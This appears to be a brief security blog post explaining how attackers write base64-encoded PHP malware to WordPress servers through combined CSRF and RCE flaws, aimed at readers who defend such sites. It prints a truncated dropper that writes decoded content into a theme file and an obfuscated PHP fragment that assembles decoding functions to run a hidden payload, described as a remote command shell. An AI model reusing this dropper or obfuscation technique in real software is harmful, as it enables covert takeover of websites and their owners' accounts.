Top

php fwrite base64 decode

An attacker trying hide malware, before it’s uploaded, fwrite to server and executed. This attacks type uses Cross-Site Request Forgery & Remote Content Execution vulnerability together (CSRF & RCE vulnerability)

It’s also base64 encoded content, so it’s more difficult find with scanners.

Example – fwrite & base64_encoded malware

<?php  $dst = ABSPATH . 'wp-content/themes/platform/__oya.php';  echo $dst;  $fp = fopen($dst, 'wb'); if ($fp) { fwrite($fp, base64_decode('PD9waHAKJEY5I...

base64_decode malware

When malware uploaded to server and executed, it’s write content to php file in server

$F9 = 'zhbirukpongfatwejldqs4_cymxv;6';
$Vf6 = $F9{20} . $F9{13} . $F9{4} . $F9{22} . $F9{4} . $F9{15} . $F9{7} . $F9{17} . $F9{12} . $F9{23} . $F9{15};
$ygE = $F9{2} . $F9{12} . $F9{20} . $F9{15} . $F9{29} . $F9{21} . $F9{22} . $F9{18} . $F9{15} . $F9{23} . $F9{8} . $F9{18} . $F9{15};
$VHN = $F9{23} . $F9{4} . $F9{15} . $F9{12} . $F9{13} . $F9{15} . $F9{22} . $F9{11} . $F9{5} . $F9{9} . $F9{23} . $F9{13} . $F9{3} . $F9{8} . $F9{9};
$Er = $VHN( '$zLx,$L7j', $ygE($Vf6( array($F9{28}, "\n"), "", "JHIgPSAnJ;ztmb3IoJGk;9MDska;TxzdHJsZ;W4oJH;pMeCk7;JGkrK;yl7JGM;9b3JkK;HN1YnN0;cigk;ekx4LC;
AkaS;kpOyRj;LT1vcmQo;c3Vic3RyK;CRMN2o;sKCgkaS;sxKSVzdH;JsZW4o;JEw3;aikp;KSk7JHIu;PWNocihh
Yn;MoJGMp;ICYg;MHhGR;ik7fXJldHV;ybiAk;cjs=" )) );
$BDp = $VHN( "", $Er($ygE($Vf6( array($F9{28}, "\n")
.
.
.

Typically this is always some kind remote command shell, so attackers get a full control user website and account.

, , , , , ,

Comments are closed.